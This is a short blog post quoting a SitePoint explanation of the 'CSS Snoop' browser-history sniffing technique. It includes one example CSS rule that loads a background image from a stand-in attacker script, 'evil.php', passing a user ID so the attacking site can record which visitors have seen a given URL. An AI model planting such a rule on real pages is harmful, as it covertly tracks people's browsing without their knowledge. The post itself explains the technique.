CSS Snoop (from SitePoint):
Now, instead of giving the URL of a benign image file, the attacking site can supply a URL to a server-side script, passing along a unique ID to identify you:
#examplelink { background-image:
url(evil.php?user=123); }
That script can then collect and store a list of all users who, in this case, have visited http://www.example.com/
.
No comments:
Post a Comment